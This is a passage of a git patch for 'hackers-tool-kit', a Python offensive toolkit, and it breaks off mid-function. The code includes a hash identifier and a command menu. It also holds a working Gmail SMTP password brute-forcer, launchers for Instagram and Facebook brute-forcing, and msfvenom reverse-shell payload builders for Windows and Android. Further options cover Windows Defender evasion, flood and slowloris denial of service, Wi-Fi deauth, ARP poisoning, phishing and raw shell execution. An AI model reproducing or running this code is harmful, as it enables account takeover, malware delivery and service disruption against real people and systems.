hash.isalnum()==True: - jerar.append("109440") - def sha1md5sha1pass(): - hs='8bceaeed74c17571c15cdb9494e992db3c263695' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109460") - def sha1sha1pass(): - hs='3109b810188fcde0900f9907d2ebcaa10277d10e' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109480") - def sha1sha1passsalt(): - hs='780d43fa11693b61875321b6b54905ee488d7760' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109500") - def sha1sha1passsubstrpass03(): - hs='5ed6bc680b59c580db4a38df307bd4621759324e' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109520") - def sha1sha1saltpass(): - hs='70506bac605485b4143ca114cbd4a3580d76a413' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109540") - def sha1sha1sha1pass(): - hs='3328ee2a3b4bf41805bd6aab8e894a992fa91549' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109560") - def sha1strtolowerusernamepass(): - hs='79f575543061e158c2da3799f999eb7c95261f07' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109580") - - def Haval192(): - hs='cd3a90a3bebd3fa6b6797eba5dab8441f16a7dfa96c6e641' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("110040") - def Haval192HMAC(): - hs='39b4d8ecf70534e2fd86bb04a877d01dbf9387e640366029' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("110080") - def Tiger192(): - hs='c086184486ec6388ff81ec9f235287270429b2253b248a70' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("110020") - def Tiger192HMAC(): - hs='8e914bb64353d4d29ab680e693272d0bd38023afa3943a41' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("110060") - - def MD5passsaltjoomla1(): - hs='35d1c0d69a2df62be2df13b087343dc9:BeKMviAfcXeTPTlX' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[32:33].find(':')==0: - jerar.append("112020") - - def SHA1Django(): - hs='sha1$Zion3R$299c3d65a0dcab1fc38421783d64d0ecf4113448' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:5].find('sha1$')==0: - jerar.append("113020") - - def Haval224(): - hs='f65d3c0ef6c56f4c74ea884815414c24dbf0195635b550f47eac651a' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("114040") - def Haval224HMAC(): - hs='f10de2518a9f7aed5cf09b455112114d18487f0c894e349c3c76a681' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("114080") - def SHA224(): - hs='e301f414993d5ec2bd1d780688d37fe41512f8b57f6923d054ef8e59' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("114020") - def SHA224HMAC(): - hs='c15ff86a859892b5e95cdfd50af17d05268824a6c9caaa54e4bf1514' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("114060") - - def SHA256(): - hs='2c740d20dab7f14ec30510a11f8fd78b82bc3a711abe8a993acdb323e78e6d5e' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115020") - def SHA256HMAC(): - hs='d3dd251b7668b8b6c12e639c681e88f2c9b81105ef41caccb25fcde7673a1132' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115120") - def Haval256(): - hs='7169ecae19a5cd729f6e9574228b8b3c91699175324e6222dec569d4281d4a4a' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115040") - def Haval256HMAC(): - hs='6aa856a2cfd349fb4ee781749d2d92a1ba2d38866e337a4a1db907654d4d4d7a' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115140") - def GOSTR341194(): - hs='ab709d384cce5fda0793becd3da0cb6a926c86a8f3460efb471adddee1c63793' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115060") - def RipeMD256(): - hs='5fcbe06df20ce8ee16e92542e591bdea706fbdc2442aecbf42c223f4461a12af' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115080") - def RipeMD256HMAC(): - hs='43227322be1b8d743e004c628e0042184f1288f27c13155412f08beeee0e54bf' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115160") - def SNEFRU256(): - hs='3a654de48e8d6b669258b2d33fe6fb179356083eed6ff67e27c5ebfa4d9732bb' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115100") - def SNEFRU256HMAC(): - hs='4e9418436e301a488f675c9508a2d518d8f8f99e966136f2dd7e308b194d74f9' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115180") - def SHA256md5pass(): - hs='b419557099cfa18a86d1d693e2b3b3e979e7a5aba361d9c4ec585a1a70c7bde4' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115200") - def SHA256sha1pass(): - hs='afbed6e0c79338dbfe0000efe6b8e74e3b7121fe73c383ae22f5b505cb39c886' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115220") - - def MD5passsaltjoomla2(): - hs='fb33e01e4f8787dc8beb93dac4107209:fxJUXVjYRafVauT77Cze8XwFrWaeAYB2' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[32:33].find(':')==0: - jerar.append("116020") - def SAM(): - hs='4318B176C3D8E3DEAAD3B435B51404EE:B7C899154197E8A2A33121D76A240AB5' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash.islower()==False and hash[32:33].find(':')==0: - jerar.append("116040") - - def SHA256Django(): - hs='sha256$Zion3R$9e1a08aa28a22dfff722fad7517bae68a55444bb5e2f909d340767cec9acf2c3' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:6].find('sha256')==0: - jerar.append("117020") - - def RipeMD320(): - hs='b4f7c8993a389eac4f421b9b3b2bfb3a241d05949324a8dab1286069a18de69aaf5ecc3c2009d8ef' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("118020") - def RipeMD320HMAC(): - hs='244516688f8ad7dd625836c0d0bfc3a888854f7c0161f01de81351f61e98807dcd55b39ffe5d7a78' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("118040") - - def SHA384(): - hs='3b21c44f8d830fa55ee9328a7713c6aad548fe6d7a4a438723a0da67c48c485220081a2fbc3e8c17fd9bd65f8d4b4e6b' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("119020") - def SHA384HMAC(): - hs='bef0dd791e814d28b4115eb6924a10beb53da47d463171fe8e63f68207521a4171219bb91d0580bca37b0f96fddeeb8b' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("119040") - - def SHA256s(): - hs='$6$g4TpUQzk$OmsZBJFwvy6MwZckPvVYfDnwsgktm2CckOlNJGy9HNwHSuHFvywGIuwkJ6Bjn3kKbB6zoyEjIYNMpHWBNxJ6g.' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$6$')==0: - jerar.append("120020") - - def SHA384Django(): - hs='sha384$Zion3R$88cfd5bc332a4af9f09aa33a1593f24eddc01de00b84395765193c3887f4deac46dc723ac14ddeb4d3a9b958816b7bba' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:6].find('sha384')==0: - print " [+] SHA-384(Django)" - jerar.append("121020") - - def SHA512(): - hs='ea8e6f0935b34e2e6573b89c0856c81b831ef2cadfdee9f44eb9aa0955155ba5e8dd97f85c73f030666846773c91404fb0e12fb38936c56f8cf38a33ac89a24e' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("122020") - def SHA512HMAC(): - hs='dd0ada8693250b31d9f44f3ec2d4a106003a6ce67eaa92e384b356d1b4ef6d66a818d47c1f3a2c6e8a9a9b9bdbd28d485e06161ccd0f528c8bbb5541c3fef36f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("122060") - def Whirlpool(): - hs='76df96157e632410998ad7f823d82930f79a96578acc8ac5ce1bfc34346cf64b4610aefa8a549da3f0c1da36dad314927cebf8ca6f3fcd0649d363c5a370dddb' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("122040") - def WhirlpoolHMAC(): - hs='77996016cf6111e97d6ad31484bab1bf7de7b7ee64aebbc243e650a75a2f9256cef104e504d3cf29405888fca5a231fcac85d36cd614b1d52fce850b53ddf7f9' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("122080") - - - print logo - while True: - jerar=[] - print """ - -------------------------------------------------------------------------""" - hash = raw_input(" HASH: ") - ADLER32(); CRC16(); CRC16CCITT(); CRC32(); CRC32B(); DESUnix(); DomainCachedCredentials(); FCS16(); GHash323(); GHash325(); GOSTR341194(); Haval128(); Haval128HMAC(); Haval160(); Haval160HMAC(); Haval192(); Haval192HMAC(); Haval224(); Haval224HMAC(); Haval256(); Haval256HMAC(); LineageIIC4(); MD2(); MD2HMAC(); MD4(); MD4HMAC(); MD5(); MD5APR(); MD5HMAC(); MD5HMACWordpress(); MD5phpBB3(); MD5Unix(); MD5Wordpress(); MD5Half(); MD5Middle(); MD5passsaltjoomla1(); MD5passsaltjoomla2(); MySQL(); MySQL5(); MySQL160bit(); NTLM(); RAdminv2x(); RipeMD128(); RipeMD128HMAC(); RipeMD160(); RipeMD160HMAC(); RipeMD256(); RipeMD256HMAC(); RipeMD320(); RipeMD320HMAC(); SAM(); SHA1(); SHA1Django(); SHA1HMAC(); SHA1MaNGOS(); SHA1MaNGOS2(); SHA224(); SHA224HMAC(); SHA256(); SHA256s(); SHA256Django(); SHA256HMAC(); SHA256md5pass(); SHA256sha1pass(); SHA384(); SHA384Django(); SHA384HMAC(); SHA512(); SHA512HMAC(); SNEFRU128(); SNEFRU128HMAC(); SNEFRU256(); SNEFRU256HMAC(); Tiger128(); Tiger128HMAC(); Tiger160(); Tiger160HMAC(); Tiger192(); Tiger192HMAC(); Whirlpool(); WhirlpoolHMAC(); XOR32(); md5passsalt(); md5saltmd5pass(); md5saltpass(); md5saltpasssalt(); md5saltpassusername(); md5saltmd5pass(); md5saltmd5passsalt(); md5saltmd5passsalt(); md5saltmd5saltpass(); md5saltmd5md5passsalt(); md5username0pass(); md5usernameLFpass(); md5usernamemd5passsalt(); md5md5pass(); md5md5passsalt(); md5md5passmd5salt(); md5md5saltpass(); md5md5saltmd5pass(); md5md5usernamepasssalt(); md5md5md5pass(); md5md5md5md5pass(); md5md5md5md5md5pass(); md5sha1pass(); md5sha1md5pass(); md5sha1md5sha1pass(); md5strtouppermd5pass(); sha1passsalt(); sha1saltpass(); sha1saltmd5pass(); sha1saltmd5passsalt(); sha1saltsha1pass(); sha1saltsha1saltsha1pass(); sha1usernamepass(); sha1usernamepasssalt(); sha1md5pass(); sha1md5passsalt(); sha1md5sha1pass(); sha1sha1pass(); sha1sha1passsalt(); sha1sha1passsubstrpass03(); sha1sha1saltpass(); sha1sha1sha1pass(); sha1strtolowerusernamepass() - - if len(jerar)==0: - print "" - print " Not Found." - elif len(jerar)>2: - jerar.sort() - print "" - print "Possible Hashs:" - print "[+] ",algorithms[jerar[0]] - print "[+] ",algorithms[jerar[1]] - print "" - print "Least Possible Hashs:" - for a in range(int(len(jerar))-2): - print "[+] ",algorithms[jerar[a+2]] - else: - jerar.sort() - print "" - print "Possible Hashs:" - for a in range(len(jerar)): - print "[+] ",algorithms[jerar[a]] -def restart(): - os.system("clear") - os.system("cd /root/hackers-tool-kit && python htk.py") -def medusa(): - k = raw_input("Target Host: ") - u = raw_input("User: ") - p = raw_input("Wordlist: ") - os.system("cat /root/hackers-tool-kit/tools/medusamods.txt") - print "\n" - m = raw_input("Module: ") - n = raw_input("Port: ") - a = 'medusa -h {0} -u {1} -P {2} -M {3} -n {4}'.format(k,u,p,m,n) - os.system(a) -def wafwoof(): - j = raw_input("Enter Target: ") - k = 'wafw00f {0}'.format(j) - os.system(k) -def cloud(): - - subdomainlist = ["ftp", "cpanel", "webmail" , "mail" , "www", "www1", "www2", "www3", "www4", "www5","ns1", "ns2" , "forums" , "blog"] - - print ('\033[1m' + "CLOUDFLARE BYPASS SCRIPT ") - - host = raw_input("Enter Target: ") - for sublist in subdomainlist: - try: - hosts = str(sublist) + "." + str(host) - showip = socket.gethostbyname(str(hosts)) - print " Cloudflare has begun to be bypassed "+str(showip)+' :| '+str(hosts) - except: - pass - - print ( '\033[93m' + "Credit Goes To: tugrulbey.com") - print ( '\033[92m' + "Credit Goes To: tztugrulbey@protonmail.com") -def brutex(): - k = raw_input("Target: ") - p = raw_input("Port: ") - a = 'brutex {0} {1}'.format(k,p) - os.system(a) -def methelp(): - os.system("cat /root/hackers-tool-kit/tools/meterpreter.txt") -def winbyp(): - os.system("cat /root/hackers-tool-kit/tools/payloads.txt") - pay = raw_input("Payload: ") - port = raw_input("Port: ") - name = raw_input("File Name: ") - os.system('echo "use evasion/windows/windows_defender_exe\n" > handler.rc') - os.system('echo "set payload {0}\n" >> handler.rc'.format(pay)) - os.system('echo "set LHOST 127.0.0.1\n" >> handler.rc') - os.system('echo "set LPORT {0}\n" >> handler.rc'.format(port)) - os.system('echo "set filename {0}.exe\n" >> handler.rc'.format(name)) - os.system('echo "run\n" >> handler.rc') - os.system("service postgresql restart") - os.system('msfconsole -r handler.rc') - os.system('rm -rf handler.rc') -def exploit(): - os.system("cat /root/hackers-tool-kit/tools/exploits.txt") - print "\n" - f = raw_input("Select Exploit: ") - os.system('echo "use {0}\n" >> handler.rc'.format(f)) - os.system('echo "show options\n" >> handler.rc'.format(f)) - os.system("service postgresql restart") - os.system('msfconsole -r handler.rc') - os.system('rm -rf handler.rc') -def phish(): - os.system("bash /root/shellphish/shellphish.sh") -def datalist(): - os.system('echo "hosts\n" >> handler.rc') - os.system('echo "services\n" >> handler.rc') - os.system("service postgresql restart") - os.system('msfconsole -r handler.rc') - os.system('rm -rf handler.rc') -def msfev(): - os.system("service postgresql start") - os.system("""msfconsole -x 'show evasion'""") -def upgrade(): - os.system("apt update && apt upgrade") -def nscript(): - os.system("cat /root/hackers-tool-kit/tools/scripts.txt") - print "\n" - j = raw_input(G+"Select Script:\033[0m ") - k = raw_input(G+"Target:\033[0m ") - a = 'nmap --script {0} {1}'.format(j,k) - os.system(a) -def main(): - found = False - while not found: - x = raw_input(N+'\033[91m[\033[0mhtk\033[91m]\033[94m->\033[92m: \033[0m') - if x == "?": - help() - if x == "winload" : - winload() - if x == "clear" : - os.system("clear") - mainbanner() - if x == "andload": - andload() - if x == "command": - c = raw_input("Command: ") - os.system(c) - if x == "msfcon" : - os.system("service postgresql start") - os.system("msfconsole") - if x == "set": - os.system("setoolkit") - if x == "msfven": - print R+"!ONLY TYPE THE ARGUMENTS DONT TYPE MSFVENOM\033[0m" - v = raw_input(G+"MSFVENOM: \033[0m") - os.system("msfvenom", v) - if x == "gmail" : - gmail() - if x == "insta": - insta() - if x == "fb" : - fb() - if x == "ipgrab": - ipgrab() - if x == "myip": - myip() - if x == "wifite": - wifite() - if x == "mon" : - mon() - if x == "netdev" : - netdev() - if x == "scannet": - scannet() - if x == "exit" : - import sys - print "follow \033[92m@unkn0wn_bali\033[0m on instagram" - sys.exit() - if x == "rebootl": - print R+"! ARE YOU SURE YOU WANT TO REBOOT YOUR WHOLE DEVICE !\033[0m" - c = raw_input("[y/n]> ") - if c == "y" : - os.system("reboot") - if c == "n" : - os.system("clear") - mainbanner() - main() - if x == "port": - port() - if x == "info": - info() - if x == "sysinfo": - sysinfo() - if x == "msfex": - msfex() - if x == "udp": - udp() - if x == "tcp": - tcp() - if x == "syn": - syn() - if x == "msfpa": - msfpa() - if x == "msfau": - msfau() - if x == "ping" : - ping() - if x == "multih": - multih() - if x == "msfall": - msfall() - if x == "hydra" : - hydra() - if x == "cupp": - cupp() - if x == "vdir": - vdir() - if x == "monoff": - monoff() - if x == "vpn": - vpn() - if x == "vpnoff": - vpnoff() - if x == "slowl": - slowl() - if x == "pidox": - pidox() - if x == "specnet": - specnet() - if x == "pingen": - pingen() - if x == "reaver": - reaver() - if x == "deauth": - deauth() - if x == "macc": - macc() - if x == "macoff": - macoff() - if x == "arppois": - appois() - if x == "sslscan": - sslscan() - if x == "payload": - payload() - if x == "crunch": - crunch() - if x == "traff": - traff() - if x == "resa": - resa() - if x == "resu": - resu() - if x == "hashid": - hashid() - if x == "restart": - restart() - if x == "medusa": - medusa() - if x == "wafwoof": - wafwoof() - if x == "cloud": - cloud() - if x == "brutex": - brutex() - if x == "methelp": - methelp() - if x == "winbyp": - winbyp() - if x == "exploit": - exploit() - if x == "phish": - phish() - if x == "datalist": - datalist() - if x == "msfev": - msfev() - if x == "upgrade": - upgrade() - if x == "nscript": - nscript() - found = True -mainbanner() -main() From eb180d3f3db471d141b88ce7f6d35088e5efda80 Mon Sep 17 00:00:00 2001 From: unkn0wn_bali <40415158+unkn0wnh4ckr@users.noreply.github.com> Date: Sun, 17 Mar 2019 20:32:41 +0100 Subject: [PATCH 032/214] Add files via upload --- htk.py | 1994 ++++++++++++++++++++++++++++++++++++++++++++++++++++++++ 1 file changed, 1994 insertions(+) create mode 100644 htk.py diff --git a/htk.py b/htk.py new file mode 100644 index 0000000..4e1d852 --- /dev/null +++ b/htk.py @@ -0,0 +1,1994 @@ +#!/usr/local/bin/python +# coding: latin-1 +#if you use this code give me credit @unkn0wn_bali +#i do not give you permission to edit this script without my credit +import os +print "Starting hackers-tool-kit... [ * ]-[0%]" +import platform +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[5%]" +import webbrowser +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[9%]" +import hashlib +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[14%]" +import subprocess +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[19%]" +import zipfile +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[23%]" +import colorama +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[25%]" +from modules import * +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[26%]" +import modules.colors +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[27%]" +import builtwith +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[29%]" +from urllib2 import urlopen +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[31%]" +from urllib2 import URLError +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[34%]" +from urllib2 import HTTPError +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[38%]" +from urllib import urlencode +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[39%]" +from plugins.DNSDumpsterAPI import DNSDumpsterAPI +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[41%]" +import whois +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[45%]" +import json +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[47%]" +from urlparse import urlparse +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[50%]" +from re import search, sub +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[55%]" +import cookielib +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[56%]" +import socket +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[59%]" +from scapy.all import * +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[60%]" +from threading import Thread, active_count +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[63%]" +import random +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[67%]" +import string +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[70%]" +import signal +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[73%]" +import ssl +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[79%]" +import argparse +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[83%]" +import sys +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[86%]" +import socks +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[89%]" +import mechanize +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[90%]" +import requests +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[94%]" +import time +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[96%]" +from datetime import datetime +now = datetime.now() +hour = now.hour +minute = now.minute +day = now.day +month = now.month +year = now.year +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[99%]" +sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) +Gb = random._urandom(20000) +bytes = random._urandom(20000) +Kb = random._urandom(20000) +r = '\033[31m' +W = '\033[90m' +R = '\033[91m' +N = '\033[0m' +G = '\033[92m' +B = '\033[94m' +Y = '\033[93m' +LB = '\033[1;36m' +P = '\033[95m' +Bl = '\033[30m' +O = '\033[33m' +p = '\033[35m' +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[100%] \033[92m READY\033[0m" +os.system("printf '\033]2;Hackers-Tool-Kit | HTK | @unkn0wn_bali\a'") +os.system("service tor start") +os.system("service postgresql start") +os.system("clear") +def mainbanner(): + os.system("cat /root/hackers-tool-kit/tools/htkbanner.txt | lolcat") + print N+"""\033[34m + .............. \033[0mtype ? for help\033[34m + ..,;:ccc,. + ......''';lxO. + .....''''..........,:ld; + .';;;:::;,,.x, + ..'''. 0Xxoc:,. ... + .... ,ONkc;,;cokOdc',. + . OMo ':ddo. + dMc :OO; + 0M. .:o. + ;Wd + ;XO, \033[93mCreated By @unkn0wn_bali On Instagram\033[34m + ,d0Odlc;,.. + ..',;:cdOOd::,. + .:d;.':;. + 'd, .' + ;l .. + .o + c + .' + .\033[92m + ▄▄ ▄▄ ▄▄▄▄▄▄▄▄ ▄▄ ▄▄▄ + ██ ██ ▀▀▀██▀▀▀ ██ ██▀ + ██ ██ ██ ██▄██ + ████████ ██ █████ + ██ ██ █████ ██ █████ ██ ██▄ + ██ ██ ██ ██ ██▄ + ▀▀ ▀▀ ▀▀ ▀▀ ▀▀\033[0m + ▒ ░░▒░▒▒ ▓▒█░░ ░▒ ▒░▒ ▒▒ ▓▒░░▒ ░ ▒▓ ░▒▓ + ▒ ░▒░ ░ ▒▒ ░ ░ ▒ ░ ░▒ ▒░ ░░ ░▒ ░ ▒ + ░ ░░ ░ ▒ ░ ░ ░░ ░ ░ ░░ ░ + ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ + """.decode('utf-8') +def help(): + print B+""" +▒▒ ▓▒█░▒ ▒▓▒ ▒ ░ ▒▒▓ ▒ ▒ ░ ░▒ ▒ ▒ ░░▒░▒▒▓▒▒░ ▒▓▒▒░ ▒ ░ ░ ▒░ ▒ ▒ + ▒ ▒▒ ░░ ░▒ ░ ░ ░ ▒ ▒ ░ ░ ░ ▒ ░▒░ ░▒ ░▒░ ▒ ░▒░ ░ ░ ░░ ░ ▒░ + ░ ▒ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░░ ░░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ + ░ ░ ░ ░ ░ ░ ░ ░░ ░ ░ ░ ░ +\033[0m ░ +? : displays this message +clear : clears screen except for banner +exit : exits script +restart : re run hackers-tool-kit +rebootl : reboot whole device +winload : windows reverse_tcp payload +andload : android reverse_tcp payload +command : execute terminal command +msfcon : metasploit console +set : setoolkit console +msfven : msfvenom +gmail : gmail bruteforce +insta : instagram bruteforce +fb : facebook bruteforce +hydra : Black-Hydra bruteforce +medusa : Medusa bruteforce +ipgrab : host to ip address +myip : show your ip +wifite : automated wifi hacker +reaver : reaver automated [ wifi hack ] +mon : put device in monitor mode +monoff : put device out of monitor mode +netdev : find all devices in your network +scannet : scan for networks around you +specnet : scan a specific network +port : scan for ports on a host +info : info gather on a host [includes port scan]\033[91m █████████████████████ \033[0m +sysinfo : info about your system \033[91m ██ ██\033[0m +msfex : shows all metasploit exploits \033[91m ██ ██\033[0m +msfpa : shows all metasploit payloads \033[91m ██\033[90m ██ ██\033[91m ██\033[0m +msfau : shows all metasploit auxiliarys \033[91m ██\033[90m ██ ██\033[91m ██\033[0m +msfall : shows all metasploit modules \033[91m ██ ██\033[0m +udp : UDP flood / dos \033[91m ██ \033[90m █ \033[91m ██\033[0m +tcp : TCP flood / dos \033[91m ██\033[90m █ \033[91m ██\033[0m +syn : SYN flood / dos \033[91m █ █\033[0m +slowl : Slow Loris dos \033[91m █ █ \033[0m +ping : pings host \033[91m █ █\033[0m +multih : start a multi handler \033[91m █ █\033[0m +cupp : make wordlists \/ vvvvvvvvv \/ +vdir : view files of a directory +vpn : activate a vpn TIP: "ctrl c" usually stops a script if you dont want to keep running it +vpnoff : stop vpn +pidox : dox website +pingen : Generate a routers default pin +deauth : deauth attack / wifi jammer +macc : changes mac address +macoff : returns mac address to normal +arppois : ARP poisoning +sslscan : ssl scan a host +payload : make a metasploit payload of your choice +crunch : Make wordlists +traff : shows your internet traffic +resa : reset account password +resu : reset unix password +hashid : find the type of hash of a hash +wafwoof : check a web application for firewall +cloud : cloudflare bypass +brutex : auto bruteforce every service of a host +methelp : show meterpreter help +winbyp : windows defender bypass +exploit : use a metasploit exploit of your choice +phish : phishing automated +datalist: list all hosts & services in the database +msfev : shows all metasploit evasions +upgrade : fully update your linux os +nscript : use a nmap script +sshver : scan for ssh version on a host +\033[91m---------------------------------------------------------------------------------\033[0m + """ +def winload(): + gw = os.popen("ip -4 route show default").read().split() + s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) + s.connect((gw[2], 0)) + ipaddr = s.getsockname()[0] + gateway = gw[2] + host = socket.gethostname() + pf = raw_input("Port: ") + na = raw_input("Name of File: ") + ak = 'msfvenom -p windows/meterpreter/reverse_tcp LPORT={0} -f exe -o /root/{1}.exe LHOST={2}'.format(pf,na,ipaddr) + os.system(ak) +def andload(): + gw = os.popen("ip -4 route show default").read().split() + s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) + s.connect((gw[2], 0)) + ipaddr = s.getsockname()[0] + gateway = gw[2] + host = socket.gethostname() + pf = raw_input("Port: ") + na = raw_input("Name of File: ") + ak = 'msfvenom -p android/meterpreter/reverse_tcp LPORT={0} -o /root/{1}.apk LHOST={2}'.format(pf,na,ipaddr) + os.system(ak) +def gmail(): + #!/usr/bin/python + '''create by Ha3MrX''' + + import smtplib + from os import system + + def main(): + print '\033[93m=================================================' + print '\033[91m create by Ha3MrX ' + print '\033[93m=================================================' + print '\033[95m ++++++++++++++++++++ ' + print '\n ' + print '\033[92m _,. ' + print ' ' + print ' ' + print ' HA3MrX ' + print ' _,. ' + print ' ,` -.) ' + print ' ( _/-\\-._ ' + print ' /,|`--._,-^| , ' + print ' \_| |`-._/|| , | ' + print ' | `-, / | / / ' + print ' | || | / / ' + print ' `r-._||/ __ / / ' + print ' __,-<_ )`-/ `./ / ' + print ' \ `--- \ / / / ' + print ' | |./ / ' + print ' / // / ' + print ' \_/ \ |/ / ' + print ' | | _,^- / / ' + print ' | , `` (\/ /_ ' + print ' \,.->._ \X-=/^ ' + print ' ( / `-._//^` ' + print ' `Y-.____(__} ' + print ' | {__) ' + print ' () \033[91m V.1.0 ' + + main() + print '\033[0m[1] start the attack' + print '[2] exit' + option = input('==>') + if option == 1: + file_path = raw_input('path of passwords file :') + else: + system('clear') + exit() + pass_file = open(file_path,'r') + pass_list = pass_file.readlines() + def login(): + i = 0 + user_name = raw_input('target email :') + server = smtplib.SMTP_SSL('smtp.gmail.com', 465) + server.ehlo() + for password in pass_list: + i = i + 1 + print str(i) + '/' + str(len(pass_list)) + try: + server.login(user_name, password) + system('clear') + main() + print '\n' + print '[+] This Account Has Been Hacked Password :' + password + ' ^_^' + break + except smtplib.SMTPAuthenticationError as e: + error = str(e) + if error[14] == '<': + system('clear') + main() + print '[+] this account has been hacked, password :' + password + ' ^_^' + + break + else: + print '[!] password not found => ' + password + login() +def port(): + n = raw_input("Enter Target: ") + os.system("nmap " + n) +def insta(): + insta = raw_input("USERNAME> ") + jl = raw_input("WORDLIST> ") + k = raw_input("THREADS> ") + ma = 'python /root/hackers-tool-kit/tools/instagram.py {0} {1} {2}'.format(insta,jl,k) + os.system(ma) +def fb(): + facebook = raw_input("[EMAIL/ID->]: ") + word = raw_input("[WORDLIST->]: ") + ks = 'cd /root/hackers-tool-kit/tools && perl fb-brute.pl {0} {1}'.format(facebook,word) + 